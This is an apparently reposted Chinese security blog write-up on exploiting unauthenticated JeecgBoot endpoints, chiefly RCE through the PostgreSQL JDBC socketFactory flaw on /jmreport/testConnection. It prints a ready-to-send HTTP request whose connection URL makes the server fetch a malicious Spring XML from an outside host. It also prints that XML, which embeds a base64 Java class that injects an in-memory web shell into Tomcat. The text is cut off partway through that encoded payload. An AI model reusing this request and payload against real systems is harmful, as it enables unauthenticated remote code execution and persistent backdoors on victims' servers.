前言
jeecg-boot之前有披露出几个未授权的漏洞,两个接口存在RCE,分别是/jmreport/queryFieldBySql和/jmreport/testConnection,其中利用的较多的应该是/jmreport/queryFieldBySql接口的Freemarker模板注入漏洞。
实际环境中,发现Freemarker模板注入漏洞利用的时候有些环境下会有些问题,比如:
1、插入freemarker payload的时候,会自动过滤点号,无法利用。
![[技术分享]记一次JeecgBoot实战分享](http://cn-sec.com/wp-content/uploads/2024/09/7-1726628103.png "[技术分享]记一次JeecgBoot实战分享")
2、还有解析失败的情况,无法利用。
![[技术分享]记一次JeecgBoot实战分享](http://cn-sec.com/wp-content/uploads/2024/09/8-1726628105.png "[技术分享]记一次JeecgBoot实战分享")
![[技术分享]记一次JeecgBoot实战分享](http://cn-sec.com/wp-content/uploads/2024/09/9-1726628106.png "[技术分享]记一次JeecgBoot实战分享")
既然Freemarker模板注入漏洞难以利用,/jmreport/testConnection接口的jdbc连接漏洞是否可以利用呢?网上流传的poc一般都是利用h2依赖,但是实际环境中经常出现没有h2依赖的情况。
jdbc mysql反序列化也经常因为mysql版本过高无法使用。
![[技术分享]记一次JeecgBoot实战分享](http://cn-sec.com/wp-content/uploads/2024/09/2-1726628107.png "[技术分享]记一次JeecgBoot实战分享")
这里部分版本可以利用jdbc pgsql的漏洞来rce,实际环境也多次利用成功。
pgsql jdbc利用
漏洞影响版本:
-
< 42.2.25
-
42.3.0 < x <=42.3.2
这里本地搭的测试环境刚好是漏洞版本42.2.24。
![[技术分享]记一次JeecgBoot实战分享](http://cn-sec.com/wp-content/uploads/2024/09/1-1726628108.png "[技术分享]记一次JeecgBoot实战分享")
该漏洞源于pgsql jdbc连接属性提供的类名实例化插件实例,驱动程序在实例化类之前并不验证类是否实现了预期的接口从而导致rce,我们可以利用org.springframework.context.support.ClassPathXmlApplicationContext和org.springframework.context.support.FileSystemXmlApplicationContext,这2个类在实例化时,会加载外部恶意xml文件导致rce。
![[技术分享]记一次JeecgBoot实战分享](http://cn-sec.com/wp-content/uploads/2024/09/7-1726628110.png "[技术分享]记一次JeecgBoot实战分享")
内存马注入
更改base64的字节码与注入的类的类名,即可自定义注入的内存马。
![[技术分享]记一次JeecgBoot实战分享](http://cn-sec.com/wp-content/uploads/2024/09/5-1726628111.png "[技术分享]记一次JeecgBoot实战分享")
![[技术分享]记一次JeecgBoot实战分享](http://cn-sec.com/wp-content/uploads/2024/09/0-1726628113.png "[技术分享]记一次JeecgBoot实战分享")
请求包和xml内容获取:
POST /jmreport/testConnection HTTP/1.1
Host:
Content-Length: 356
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.90.1:3100
Referer: http://192.168.90.1:3100/login?redirect=/dashboard/analysis
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{
"id": "1",
"code": "dataSource1",
"dbType": "H2",
"dbDriver": "org.postgresql.Driver",
"dbUrl": "jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://1.1.1.1/b.xml",
"dbName": "test",
"dbUsername": "sa",
"dbPassword": "",
"connectTimes": 5
}
b.xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:spring="http://camel.apache.org/schema/spring"
xmlns:context="http://www.springframework.org/schema/context"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd http://camel.apache.org/schema/spring http://camel.apache.org/schema/spring/camel-spring.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context.xsd">
<context:property-placeholder ignore-resource-not-found="false" ignore-unresolvable="false"/>
<bean id="ClassBase64Str" class="java.lang.String">
<constructor-arg value="yv66vgAAADEBewEAIG9yZy9zcHJpbmdmcmFtZXdvcmsvbW0vU09BUFV0aWxzBwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEADGdldENsYXNzTmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEQ29kZQEAPW9yZy5hcGFjaGUuY29tbW9ucy5sYW5nLlNlcnZsZXRDb250ZXh0QXR0cmlidXRlVmZwbWprTGlzdGVuZXIIAAgBAA9nZXRCYXNlNjRTdHJpbmcBAApFeGNlcHRpb25zAQATamF2YS9pby9JT0V4Y2VwdGlvbgcADAEAEGphdmEvbGFuZy9TdHJpbmcHAA4BC+hINHNJQUFBQUFBQUFBS1ZYYVZoVTF4bCtEek53aDJFMGNWQVViWk80d3pBd2FrUVFraWhySUFJYUo4VWdNZTNsY29Hcnc4dzQ5dzZLYld5YjJuUkwwNzFwdWk5SmFSdmJhaHNIbFdxTVhkS20rNUx1Kzk2MC9kOC9hZnFlZXk4RERJUDRQSDBZN25MTzk3M2ZkOTV2T2VjKzk5K0xsd0ZzeGI4RmJrK2toaU5xVXRWRzlJaVdHQjFOeE0xSVRJMFBSNko2YWl5bVd5Mkp1S1VmdDVvc0syVU1wQzI5ZHlnNWV2aElsMkZhZWx4UEtSQUNLdzZyWTZxajFCSlRUYk1yb1E3S0tZL0FCamwxUEdJNldOT1krL1dqYWQyMFprQUtCWXB1TStLR2RZZUFwNkt5VjhEYmtoalVCVzdvTXVKNlQzcDBRRS9kb3c3RU9CTHNTbWhxckZkTkdmTGRIZlJhSTRZcHNLdnIvMXBNWXdBS2ZINTRzVlJnZFVWWDNtVTFTdStFSnJCeWdYa0pjcU1FS2FYY01ObXA2Ryt1ekpWdDVOeUFRRUYvczBESm9EN0VWZHJqaEtWNForZDhoUURLc1ZyQ3JoRzRNZVVRMk1yL1ZHSmNIeFRZNUxpN0VOVnRZM3Jjc2wwdk5lZFBDS3kvRG0xeTc5cnRaS1FNTldhY2tKWkxaenh0TzY3cFNjdEl4QldzNDhKZFRDMDFuclFTa1JZak9VSjZCSHdwM1V3eU1veGJydE1qbHBXTWRQQ1N0ZTlJVWtzeGRkTWt0TUF0Q3l2WkVoVDJKQVlPeStTeFhVdGJSaXpTclNZbGlMc0FnYzJMV3JZRnFiTjJVV1lVVkF0c3ZDNDhCUkhHNnZvV3JXQ3J3RTNYWHF1Q1d3V1d6Rm1tZ2xvT1JTMVZPOEkzdDBDV0RldldYRS9JWTBYbE5hUE9sS3ZIVGo5cTBDRGdIOUZsZHZlb28zWU56c1E4eWxLS0QxUDJOdHhlakFLd2dvdHByTU1XeitibEhObktmT3E3MFZTQ0xaRDE0SmpxVldOcFBZQldCN2FOV1orcnBlQk9acFBHbWxhTk9FdG56WnlTSFZGVFVibVF1S1kzVmg0TW9CTjMrZEdCUFFKbHd6TWt0NmNTbzFsRzdsNDhIeDFtY29sYk1HOEQ2RWFQbi83dkpZVjJETndrWGplUC9IbHBITURkMkM4NWlUSitNeUh1VU0wUk84eXY4S01YUzMyb1lyNG4wM1MvZnZiNjl3NGMxaldyY2Y1STVmeWhBUHB3c0FRNzBPL0RSaDgyc3ptbGZYZ2wrMnFTclNjQTFZa0JHNWFQaHV6QXNJTHlSRGFQdGQ0QUJxR1hZRHVHNkdkVFc5U0hFYmRwNUxRR0JhelpFcExVR1RjdGxXRVRxRnd3ZTNMYlNnQXhqUHB4Qk9UMjVqa0NabExYbU5sYVNyZjI2T05SdmlsSWNpVTAxRHh1NmN3YmIwVmxmM01BS1pneVFTeW5CK2N4M0N0Yis1Z2ZSM0dNU25LN2txS2RqcVNwYSttVVlZMUhhTVFXSGNjSjZjK3I1eVN1dzRxQ0J4d0gzSjVmV3BHdjM3OFdyL1BqSkY3UFJwWXpxZUFOQWt1bjlaMTlSNkI4UGtwMlMzb2pIdkxqRk40a1U3SFVxZEQ5Ym9XdW5sWXpFcEhtOU5DUW50SUhuVG5xdlJWdmt4bjRNSXNtdjR5Q1IreU9yZzdLblZwZ2VVWGU2bjRuM3VYSE8vQnVnY0NBYXVvN3RyZnFtcjNCbCtXTHNJekdlL0UrNmV6NzJiUUhFKzFHWEkzeGpDQzNVam41QVR3bXVmMWdBQ3RRSnNVK3pNeUo2OGRtTW1ldUg5azgveWcrSm5uNE9MRll5bXJNbFB0em5xeGx2L2drUGlYcGY1eUZtOTNYS0Y1STZ0cDdGeTIyUEswdTY4UUVQaU45L3F6YjNaM1pua1EwclkyMEczcHNjTlkyK2lRVGJVeE4xVTd2ZWd2TE5qcVNXK1oyWjllbU03ZlZ1VzFqcXN3U1NlbERNY3BFYkRoWGtwdktzanhIbHBVTGFDbklNTXRKREtNYVU1a2I5cWhBOVNMTmY2N3BBTTdqZ296T1JlNWZzbGVtazNwS2k5a2Q2Q3V5Rms3aFVrNjQ1bFRtMDM2Y3hoWHFtcnJWcEdteWl6cUh3NHFEVXVBcXZ1ckhKTDdHTGtUd25KM3BXcjN4RzNoV0tuNlRzYWMzSjA3SWpMU3pOelY5eHNrNS9jZ0RDQTltVEc0ekhhOFpOVXl0cHJrcDJqYWQ5Q2tmdmtlTW9ZUzdtMjVjaEtYcGZ2QUQvRkJ5OENQV2tHUGZxVVFmZnVJVWRMZHVqU1RJK3U0OGVQM3o4UExGd1VHZ3FaL2laOUxVendWV0xTU2w0SmNzSWlNK2xqakNOZXpNUTJiL2RmTDdhL3pHajEvaHR3cFd1YjJ5Um01ME5jMTJvL0RoRDg3V21TWHZUN1RyRU9ERFg2aXhZMGR0WGQzZ0RuMmdmcnRXWDd1ejFvZS9NZWl0cXNYNWZ6QVV4NDRkOCtHZldNdVM4NEs2OFBES0xZMWZRRUtlV3V4N3EzMzM4VW14cjhWOGE2T0c0SDFsYUJJM2hJSi9Qd2N0Rkh6aEhIYUZndjg2aC9hem5DcUFuMWRaelVBWi8xYWloRThCUjQzM0pUWTRQd2hjeUgyVWxMS3JRbFdUV0w0NDVtcWlyTEV4eXh3OUYxTStMVU9RcUVLMlFCZjlkaTVRU2hXSHFqeFZseWZ4c2pOWnVDTGJwWnRuUVJWbm9ZcHBaSlVOOVhMYzVFTFYycHAwL213T3hJWlpFQ0lMd1UwWHQ5Z1FhNmNoeE9QVVVEaDN0U3FEeGl2WTBoME9QWVZkRjlCU3dKSjZjdWFGRCswWmREMkdSMFBoU2V6ckNWL0FQUUlOM2luMDlrM2lRRU5oZVdId1hnN2U1OEVCUGg2cXpqN2VYKzUxbjczQlZ4Rkd1NEJoRDRMR2VTUWFpc3FMQ3Fkd3RFOE9aNUFPR3BNNG5zRnJwbERRRjhyZ3dRemVQSW0zbEJlRkNQeDJnUXplazhHakdYd29nNDlrOElueXdneWVPRENCd29haUNYaDd6c3JERDd2VEZOWXpPUzdoQ3U4ZW01TjJSZ0hZek5GSy9vVVFRUlhxRU9acHRocDdlSEx1NWNnQVA3UVQySVl4M0lxSGVRNDZ6NFBXRkFtK2hBWWkxZU1aSnFIa3RFT2VMdEJNeEExa0xvSkhzQkdiYUtjT0Q5RkNCV083R3cvWVZnb2xxMW51cjdyYyszQ1Ixc1AwdFk2am0rQjlpV2FLRkJRb3FGR3dSY0UyQmRzVkdoY0sxdjhIb3BrM0dWdWVVSG45TkhWa2VheTN3OS9CRVdrbExMcXJndmVleCtlQ2gzaTVnbTNkRXlqdnFacjE1bXZ3VHNERFgvaU1uZHZMc0p3WUsralRPZ2xQYjduZGNWeWlQcy9WU05SNjBTMWowRk1kUFBrRXlxcVpIMU5FV3RMZ3JjN2djcy9FU3krRW4wVmdDcWY3V0NUUFBCMzJadkQxTUJXK2RZYitMVUVwcysrMHkvODJzZ0MwRUwrVjdMVnp0b1B6blpTNGl5bTlod25kUlc3Mmt0RjlqTWgreWtkdHJyZlRqMVg4L3p5K3dGWFRJM3dSWjJ3MjYzR1dkY1JQY3hMMUpYeVpkMzZINFNtY3N5TUJycy83SWhRRmt3cE85U2c0WFJ5WVJaMlF4eFozc1M4eWlIS3g0OEh2bjhlUHU4UEI1NzJYY0tyUEUreUladkNMTUxPTTd5ZjdQRlY4L2QwVi9ENzdPOU1kL0NNMXlNNmZQZFNnc09EOUpLVWF2T1hrNHNIZ1gyY2psWHNYd3JIcmRRdTluODdXMVhRSlBPc1g0U0JIKzhuR2ZWenZJWEowdjgzS0had3BZZzQ5eDlVV2NLYkpmdkp3dmhyZkpqOWVhdHhKenI1alYvOTROZ1BIOFYyYnN6cW5TeHlWaVRWREN2NEh2VGVxMlc4U0FBQT0IABABAAY8aW5pdD4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYMABIAEwoADwAUAQADKClWAQATamF2YS9sYW5nL0V4Y2VwdGlvbgcAFwEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEACGxpc3RlbmVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAHY29udGV4dAEACGNvbnRleHRzAQAQTGphdmEvdXRpbC9MaXN0OwEABHRoaXMBACJMb3JnL3NwcmluZ2ZyYW1ld29yay9tbS9TT0FQVXRpbHM7AQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEAJExqYXZhL3V0aWwvTGlzdDxMamF2YS9sYW5nL09iamVjdDs+OwEADmphdmEvdXRpbC9MaXN0BwAkAQASamF2YS91dGlsL0l0ZXJhdG9yBwAmAQANU3RhY2tNYXBUYWJsZQwAEgAWCgAEACkBAApnZXRDb250ZXh0AQASKClMamF2YS91dGlsL0xpc3Q7DAArACwKAAIALQEACGl0ZXJhdG9yAQAWKClMamF2YS91dGlsL0l0ZXJhdG9yOwwALwAwCwAlADEBAAdoYXNOZXh0AQADKClaDAAzADQLACcANQEABG5leHQBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwwANwA4CwAnADkBAAtnZXRMaXN0ZW5lcgEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DAA7ADwKAAIAPQEAC2FkZExpc3RlbmVyAQAnKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylWDAA/AEAKAAIAQQEABGtleTEBAAhjaGlsZHJlbgEAE0xqYXZhL3V0aWwvSGFzaE1hcDsBAANrZXkBAAtjaGlsZHJlbk1hcAEABnRocmVhZAEAEkxqYXZhL2xhbmcvVGhyZWFkOwEAAWUBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAAd0aHJlYWRzAQATW0xqYXZhL2xhbmcvVGhyZWFkOwcATQEAEGphdmEvbGFuZy9UaHJlYWQHAE8BABFqYXZhL3V0aWwvSGFzaE1hcAcAUQEAE2phdmEvdXRpbC9BcnJheUxpc3QHAFMKAFQAKQEACmdldFRocmVhZHMIAFYBAAxpbnZva2VNZXRob2QBADgoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvT2JqZWN0OwwAWABZCgACAFoBAAdnZXROYW1lDABcAAYKAFAAXQEAHENvbnRhaW5lckJhY2tncm91bmRQcm9jZXNzb3IIAF8BAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgwAYQBiCgAPAGMBAAZ0YXJnZXQIAGUBAAVnZXRGVgwAZwBZCgACAGgBAAZ0aGlzJDAIAGoIAEQBAAZrZXlTZXQBABEoKUxqYXZhL3V0aWwvU2V0OwwAbQBuCgBSAG8BAA1qYXZhL3V0aWwvU2V0BwBxCwByADEBAANnZXQMAHQAPAoAUgB1AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7DAB3AHgKAAQAeQEAD2phdmEvbGFuZy9DbGFzcwcAewoAfABdAQAPU3RhbmRhcmRDb250ZXh0CAB+AQADYWRkAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaDACAAIELACUAggEAFVRvbWNhdEVtYmVkZGVkQ29udGV4dAgAhAEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsMAIYAhwoAUACIAQAIdG9TdHJpbmcMAIoABgoAfACLAQAZUGFyYWxsZWxXZWJhcHBDbGFzc0xvYWRlcggAjQEAH1RvbWNhdEVtYmVkZGVkV2ViYXBwQ2xhc3NMb2FkZXIIAI8BAAlyZXNvdXJjZXMIAJEIAB0BABpqYXZhL2xhbmcvUnVudGltZUV4Y2VwdGlvbgcAlAEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgwAEgCWCgCVAJcBACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgcAmQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24HAJsBACtqYXZhL2xhbmcvcmVmbGVjdC9JbnZvY2F0aW9uVGFyZ2V0RXhjZXB0aW9uBwCdAQAJU2lnbmF0dXJlAQAmKClMamF2YS91dGlsL0xpc3Q8TGphdmEvbGFuZy9PYmplY3Q7PjsBABNqYXZhL2xhbmcvVGhyb3dhYmxlBwChAQAJY2xhenpCeXRlAQACW0IBAAtkZWZpbmVDbGFzcwEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAFY2xhenoBABFMamF2YS9sYW5nL0NsYXNzOwEAC2NsYXNzTG9hZGVyAQAXTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIHAKsBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsMAK0ArgoAUACvAQAOZ2V0Q2xhc3NMb2FkZXIMALEAhwoAfACyDAAFAAYKAAIAtAEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsMALYAtwoArAC4AQALbmV3SW5zdGFuY2UMALoAOAoAfAC7DAAKAAYKAAIAvQEADGRlY29kZUJhc2U2NAEAFihMamF2YS9sYW5nL1N0cmluZzspW0IMAL8AwAoAAgDBAQAOZ3ppcERlY29tcHJlc3MBAAYoW0IpW0IMAMMAxAoAAgDFCAClBwCkAQARamF2YS9sYW5nL0ludGVnZXIHAMkBAARUWVBFDADLAKgJAMoAzAEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwwAzgDPCgB8ANABABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QHANIBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgwA1ADVCgDTANYBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwwA2ADZCgDKANoBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMANwA3QoA0wDeAQAHb2JqZWN0cwEAE1tMamF2YS9sYW5nL09iamVjdDsBAAlsaXN0ZW5lcnMBAAlhcnJheUxpc3QBABVMamF2YS91dGlsL0FycmF5TGlzdDsBAAppc0luamVjdGVkAQAnKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylaDADlAOYKAAIA5wEAG2FkZEFwcGxpY2F0aW9uRXZlbnRMaXN0ZW5lcggA6QEAXShMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzcztbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwAWADrCgACAOwBABxnZXRBcHBsaWNhdGlvbkV2ZW50TGlzdGVuZXJzCADuBwDhAQAQamF2YS91dGlsL0FycmF5cwcA8QEABmFzTGlzdAEAJShbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL3V0aWwvTGlzdDsMAPMA9AoA8gD1AQAZKExqYXZhL3V0aWwvQ29sbGVjdGlvbjspVgwAEgD3CgBUAPgKAFQAggEAHHNldEFwcGxpY2F0aW9uRXZlbnRMaXN0ZW5lcnMIAPsBAAd0b0FycmF5AQAVKClbTGphdmEvbGFuZy9PYmplY3Q7DAD9AP4KAFQA/wEAAWkBAAFJAQANZXZpbENsYXNzTmFtZQEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABHNpemUBAAMoKUkMAQUBBgoAVAEHAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7DAB0AQkKAFQBCgEADGRlY29kZXJDbGFzcwEAB2RlY29kZXIBAAdpZ25vcmVkAQAJYmFzZTY0U3RyAQAUTGphdmEvbGFuZy9DbGFzczwqPjsBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyCAERAQAHZm9yTmFtZQwBEwC3CgB8ARQBAAxkZWNvZGVCdWZmZXIIARYBAAlnZXRNZXRob2QMARgAzwoAfAEZAQAQamF2YS51dGlsLkJhc2U2NAgBGwEACmdldERlY29kZXIIAR0BAAZkZWNvZGUIAR8BACBqYXZhL2xhbmcvQ2xhc3NOb3RGb3VuZEV4Y2VwdGlvbgcBIQEADmNvbXByZXNzZWREYXRhAQADb3V0AQAfTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEAAmluAQAeTGphdmEvaW8vQnl0ZUFycmF5SW5wdXRTdHJlYW07AQAGdW5nemlwAQAfTGphdmEvdXRpbC96aXAvR1pJUElucHV0U3RyZWFtOwEABmJ1ZmZlcgEAAW4BAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQcBLAEAHGphdmEvaW8vQnl0ZUFycmF5SW5wdXRTdHJlYW0HAS4BAB1qYXZhL3V0aWwvemlwL0daSVBJbnB1dFN0cmVhbQcBMAoBLQApAQAFKFtCKVYMABIBMwoBLwE0AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWDAASATYKATEBNwEABHJlYWQBAAUoW0IpSQwBOQE6CgExATsBAAV3cml0ZQEAByhbQklJKVYMAT0BPgoBLQE/AQALdG9CeXRlQXJyYXkBAAQoKVtCDAFBAUIKAS0BQwEAA29iagEACWZpZWxkTmFtZQEABWZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEABGdldEYBAD8oTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsMAUkBSgoAAgFLAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQHAU0KAU4A1goBTgB1AQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uBwFRAQAgTGphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbjsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7DAFUAVUKAHwBVgEADWdldFN1cGVyY2xhc3MMAVgAeAoAfAFZCgFSABQBAAx0YXJnZXRPYmplY3QBAAptZXRob2ROYW1lAQAHbWV0aG9kcwEAG1tMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAIUxqYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uOwEAIkxqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbjsBAApwYXJhbUNsYXp6AQASW0xqYXZhL2xhbmcvQ2xhc3M7AQAFcGFyYW0BAAZtZXRob2QBAAl0ZW1wQ2xhc3MHAV8BABJnZXREZWNsYXJlZE1ldGhvZHMBAB0oKVtMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwwBaAFpCgB8AWoKANMAXQEABmVxdWFscwwBbQCBCgAPAW4BABFnZXRQYXJhbWV0ZXJUeXBlcwEAFCgpW0xqYXZhL2xhbmcvQ2xhc3M7DAFwAXEKANMBcgoAnAAUAQAKZ2V0TWVzc2FnZQwBdQAGCgCaAXYKAJUAFAEACDxjbGluaXQ+CgACACkAIQACAAQAAAAAAA4AAQAFAAYAAQAHAAAAEAABAAEAAAAEEwAJsAAAAAAAAQAKAAYAAgALAAAABAABAA0ABwAAABcAAwABAAAAC7sAD1kTABG3ABWwAAAAAAABABIAFgABAAcAAADYAAMABQAAADYqtwAqKrYALkwruQAyAQBNLLkANgEAmQAbLLkAOgEATiottwA+OgQqLRkEtgBCp//ipwAETLEAAQAEADEANAAYAAQAGQAAACYACQAAACQABAAmAAkAJwAgACgAJwApAC4A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